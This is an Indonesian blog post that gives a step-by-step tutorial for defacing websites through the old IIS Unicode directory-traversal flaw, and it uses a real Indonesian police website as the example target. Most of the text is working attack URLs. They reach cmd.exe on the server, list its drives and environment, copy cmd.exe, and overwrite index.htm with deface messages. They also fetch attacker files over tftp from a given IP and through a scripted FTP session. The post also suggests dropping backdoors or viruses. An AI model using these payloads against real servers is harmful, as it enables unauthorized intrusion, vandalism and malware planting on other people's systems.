ini hanyalah contoh !!!!!untuk melakukan deface website1. Kita Harus menentukan WebSite Target/ Sasaran Kita : www.target.loe contoh–>> www.polri.go.id
2. Login Ini Merupakan Directory yang Ada Di Web Site TersebutDirectory Ini Di Configurasi Dengan Script tertentu Supayafile dalam Web tersebut Berhubungan Jika terjadi bug pada script nya maka kita bisa bembus web iniada beberapa contoh login diantaranya :a)/_vti_binb)/_vti_cnfc)/cgi-bind)/scriptse)/msadc
3. Unicode —>> merupakan code yang dapat membaca script configurasi website tersebut code ini yang dapat membaca bug cgi nyahasil codingnya seperti bisa 1-3 x pengulangan tergantung target yang akan kita hackinnga) ..%c1%1c..b) ..%c0%9v..c) ..%c0%af..d) ..%c0%qf..
e) ..%c1%8s..f) ..%e0%80%af..g) ..%c1%9c..h) ..%c1%pc..
4. OS target –>>ini Menyatakan Sertificate Web Os kita WinNT dan Win980xB5 ISO 8859-10xC5 ISO 8859-10xEA CP4370×2140 JIS X 02080×22 ISO 8859-1
5. Cara KerjaSecara Garis Besar deface Ini dilakukan Dengan tiga Cara yaitu :A.) Deface WebSite Perintah Echo
a.)Secara umum : http://target/login/unicode/os/system/c+dir atau http://www.polri.go.id/login/unicode/os/system/c+dir
http://target/_vti_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\ contohnya –>>
Jika terdapat Bug Maka Pada title brower kita ada kata CGi Error Maka Kita telah menembus web site ituMaka Yang terlihat pada brower kita adalah list yang berupa isi hardisk webserver tersebut sama halnyacommand dir yang kita lakukan di Dos PromptDirectory of c:\10/05/2001 19:56
Programs Files10/05/2001 19:56
Inetpub08/05/2001 10:23 230 cmd.exe24/04/2001 04:33 4.620 1home.htm05/10/2000 12:40 668 about.htm10/05/2001 19:54
AboutUs11/05/2001 10:28 131 about_us.htm28/10/2000 14:49 4.911 about_us.old.htm
b.)Setelah berhasil liat List Hardisk Kita Harus cari Path_Translade web nya dengan menggunakan command/c+dir+c:\ di ubah menjadi /c+set
http://target/_vti_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\ menjadi http://target/_vti_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+set/c+dir+c:\ di ubah menjadi /c+set
maka Akan keluar CGI error yang isinya menyatakan Configurasi Batch Sytem WebServer tersebutKeluar Macam - Macam Yang Perlu dilihat cuma Path_Translade=d:\wwwpolri
c.) Langkah Selanjutnya Adalah Copy file cmd.exe dengan nama baru cmd1.exe atau nama anda contoh Jangkrik.exe dengan mengganti
/c+dir+c:\ menjadi /c+copy+c:\
lalu ditambahkan dengan : winnt\system32\cmd.exe+c:\jangkrik.exe
sehingga kita dapatkan :http://target/_vti_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+copy+c:\winnt\system32\cmd.exe+c:\jangkrik.exe
sekarang kamu bisa liat file cmd1.exe udah ada di direktori :
http://target/_vti_bin/..%c0%af../..%c0%af../..%c0%af../jangkrik.exe?/c+dir+c:\Tujuan Ini Sebenarnya untuk menyingkat command pada addres ie kita
d.)Cari halaman index ke www.target.com/blah.idaKadang-kadang ekstensi .ida yang tidak diketahui akan merespon lokal path.Kalo trik .ida tidak bekerja, coba gunakan direktori InetPub :
http://target/_vti_bin/..%c0%af../..%c0%af../..%c0%af../jangkrik.exe?/c+dir+c:\inetpub\http://target/_vti_bin/..%c0%af../..%c0%af../..%c0%af../jangkrik.exe?/c+dir+c:\inetpub\wwwroot\http://target/_vti_bin/..%c0%af../..%c0%af../..%c0%af../jangkrik.exe?/c+dir+c:\inetpub\wwwroot\index.htm
sebenarnya langkah ini tidak perlu tapi untuk jaga -jaga kan ngak papadengan langkah b.) tadi sebenarnya kita sudah tau dimana letah index.htm nya atau dengan kata lain folder webnya
e.)kalau lo merasa dirinya hacker backup dulu halaman depan web nya, karena hacker kerjanya bukan menghancurkan tapi memperingatkanhanya orang - orang amatiran atau katalain orang yang berjiwa vandalis yang kerja merusak tanpa backup index.htm nya, jika tidak kita menulisnya dengan nama file baru dengan cara :
http://target/_vti_bin/..%c0%af../..%c0%af../..%c0%af../jangkrik.exe?/c+copy+c:\inetpub\wwwroot\index.htm+c:\inetpub\wwwroot\index.htm.bak
f.) Baru Kita deface atau echo Halaman Depannya dengan command dibawah ini :
http://target/_vti_bin/..%c0%af../..%c0%af../..%c0%af../jangkrik.exe?/c+echo+You%20Were%20Hacked+>+c:\inetpub\wwwroot\index.htmuntuk tidak merusak web nya kita tulis dengan nama file baruhttp://target/_vti_bin/..%c0%af../..%c0%af../..%c0%af../jangkrik.exe?/c+echo+You%20Were%20Hacked+>+c:\inetpub\wwwroot\jangkrik.htm
/c+echo+You%20Were%20Hacked+>+c:\ >>> adalah untuk menuliskan kata-kata You Were Hacked pada
c:\inetpub\wwwroot\index.htm file yang ditulis atau c:\inetpub\wwwroot\jangkrik.htm file yang ditulis
Untuk Anda yang telah Paham Bahasa Html Kalau pengen Hasil Defacenya keren Gunakan command ini/c+echo”
This Web Site Hacking BY
….:::J.A.N.G.K.|.K:…
Thanks To Pepole On Irc.Dal.net %23MinangCrew And %23Hackermuda“+>+c:\inepub\wwwroot\index.htm/c+echo”
This Web Site Hacking BY
….:::J.A.N.G.K.|.K:…
Thanks To Pepole On Irc.Dal.net %23MinangCrew And %23Hackermuda“+>+c:\inepub\wwwroot\jangkrik.htmketerangan :%3d adalah pernyataan tanda =%22 adalah Pernyataan tanda ”%23 adalah pernyataan tanda #Untuk Anda Yang Paham Html Anda Bisa NGapain aja Tuh Deface Web Anda. Biar Bagus hack deface nya di input pakai Flash juga
g.) Langkah terkahir untuk liat hasilnya Membaca file yang lain dengan menggunakan perintah ‘type’ :
http://target/_vti_bin/..%c0%af../..%c0%af../..%c0%af../jangkrik.exe?/c+type+c:\inetpub\wwwroot\index.htmhttp://target/_vti_bin/..%c0%af../..%c0%af../..%c0%af../jangkrik.exe?/c+type+c:\inetpub\wwwroot\jangkrik.htmAtau liat Langsung aja http://www.polri.go.id/ atau www.polri.go.id/jangkrik.htm
Jika dikau menemukan webserver ini dalam penulisannya accses denied ( penolakan penulisan ) Maka langkah kedua yaitu dengan cara tftp:
B.) Deface WebSite Dengan Cara tftp
Deface nya dilakukan dengan meng-upload file lewat TFTP32Untuk Mendukung Tftp kita download dulu softwarenya http://www.download.com ketik keyword nya TFTP32Dikau Main Di Kompi diserver (sebab di user pasti takkan bisa).Meng-upload file lewat TFTP32.. koe tdk perlu mengcopy cmd.exe nyah langsung sajah.mari kita mulai meng-uploadnyah perintahnya sesuai langkah berikut ini :
a.)Kita Lakukan Langkah a.) (A.)pada deface dengan echo untuk mencari vulnernnya atau bugcginyasehinggha kita mendapatkan holenya atau script nya http://www.targethost.com/scripts/..%255c..%255c /winnt/system32/cmd.exe?/langkah selanjutnya yaitu uploadnya lagi. Namun Sebelumnya kita Dah siapkan File htm/html halaman web defacenya ( berkreasi lah dikau disini )Setelah semua siap baru upload dengan command http://www.targethost.com/scripts/..%255c..%255c /winnt/system32/cmd.exe?/c+tftp+-i+202.95.145.71(IP mu)+get+antique.htm(file yg mau koe up-load)+ C:\InetPub\wwwroot\main.html
b.)Kita liat lagi apa yg terjadi di IE kita.
CGI ErrorThe specified CGI application misbehaved by not returning a complete set of HTTP headers. The headers it did return are :
Waa..waaa .selamat dikau telah berhasil meng-upload file dikau memakai sofwer TFTP32 tadee silahkan buka web site target tadi
Kekurangannyah dalam meng-upload file lewat TFTP32 terkadang suatu server (web site) tidak mau menerima up-load file kita tadee.Jikalau itu terjadi maka gunakanlah cara pertama diatas tadee.
C.) Dengan Cara Ftp Dengan WebKita Yang Telah Kita Isi Dengan Bahan Deface Kita
Langkah Pertama adalah kita bikin dulu domain gratisan di web server gratisan. di web itu kita drop halaman web deface kita atau backdoor,virus atau program penghancur lainnya
selanjutnya kita lakukan Sama dengan Cara langkah a.)(A.) setelah dikau tau hole cgi bugnya atau unicodennya maka dikau lakukan langkah berikut ini:
a.)Setelaha kita menemukan vulnernyahttp://www.targethost.com/scripts/..%255c..%255c /winnt/system32/cmd.exe?/c+dir+c:\Directory of c:\10/05/2001 19:56
Programs Files10/05/2001 19:56
Inetpub08/05/2001 10:23 230 cmd.exe24/04/2001 04:33 4.620 1home.htm05/10/2000 12:40 668 about.htm10/05/2001 19:54
AboutUs11/05/2001 10:28 131 about_us.htm28/10/2000 14:49 4.911 about_us.old.htm
b.) Lalu kita lakukan langkah copy sesuai di langkah b.)(A.) —->>tujuan nya memedekan command unicode nya
c.) Lalu Kita Liat +set nya untuk melihat patch translade nyahttp://www.targethost.com/scripts/..%255c..%255c /winnt/system32/cmd.exe?/c+set
Kira Nya path nya di c:\inetpub\wwwroot\
d.)Langkah Selanjutnya Yaitu kita membuat script ftp- http://www.targethost.com/scripts/..%255c..%255c /winnt/system32/cmd.exe?/c+echo+open+geocities.com+>>+c:\inetpub\wwwroot\jangkrik.ftp- http://www.targethost.com/scripts/..%255c..%255c /winnt/system32/cmd.exe?/c+echo+jangkrik+>>+c:\inetpub\wwwroot\jangkrik.ftp- http://www.targethost.com/scripts/..%255c..%255c /winnt/system32/cmd.exe?/c+echo+anuamakang+>>+c:\inetpub\wwwroot\jangkrik.ftp- http://www.targethost.com/scripts/..%255c..%255c /winnt/system32/cmd.exe?/c+echo+lcd+c:\inetpub\wwwroot\+>>+c:\inetpub\wwwroot\jangkrik.ftp- http://www.targethost.com/scripts/..%255c..%255c /winnt/system32/cmd.exe?/c+echo+ascii+>>+c:\inetpub\wwwroot\jangkrik.ftp- http://www.targethost.com/scripts/..%255c..%255c /winnt/system32/cmd.exe?/c+echo+get+jangkrik.htm+>>+c:\inetpub\wwwroot\jangkrik.ftp- http://www.targethost.com/scripts/..%255c..%255c /winnt/system32/cmd.exe?/c+echo+close+>>+c:\inetpub\wwwroot\jangkrik.ftp
Setelah Scrip jangkrik.ftp selesai di liat lagi script nya apa benarhttp://www.targethost.com/scripts/..%255c..%255c /winnt/system32/cmd.exe?/c+type+c:\inetpub\wwwroot\jangkrik.ftp
Setelah selesai script tuh kita jalan kan lagi script nya:http://www.targethost.com/scripts/..%255c..%255c /winnt/system32/cmd.exe?/c+ftp+-s:c:\inetpub\wwwroot\jangkrik.ftp
buka ie satulagi untuk liat file nya dah smapai belumhttp://www.targethost.com/scripts/..%255c..%255c /winnt/system32/cmd.exe?/c+dir+c:\inetpub\wwwroot\Kalau dah terkirim selamat dah
Keterangan nya :Pada scrip jangkrik.ftp itu kita muatkan hal ini sebenarnyaopen geocities.com —>>> scriptnya —>> +echo+open+geocities.com+>>+c:\inetpub\wwwroot\jangkrik.ftpjangkrik —>> user name —>>> scriptnya –>> +echo+jangkrik+>>+c:\inetpub\wwwroot\jangkrik.ftpanuamakang —>>> password —>>> scriptnya –>> +echo+anuamakang+>>+c:\inetpub\wwwroot\jangkrik.ftplcd c:\inetpub\wwwroot\ —>>> folder tujuan —>>> scriptnya –>>>+echo+lcd+c:\inetpub\wwwroot\+>>+c:\inetpub\wwwroot\jangkrik.ftpascii —>>> bentuk file —>>> scripnya —>>> +echo+ascii+>>+c:\inetpub\wwwroot\jangkrik.ftpget jangkrik.htm —->>> command tranfer file —>>> +echo+get+jangkrik.htm+>>+c:\inetpub\wwwroot\jangkrik.ftpclose —>> perintah dc ke web server —->>> scripnya —>>> +echo+close+>>+c:\inetpub\wwwroot\
Tidak ada komentar:
Posting Komentar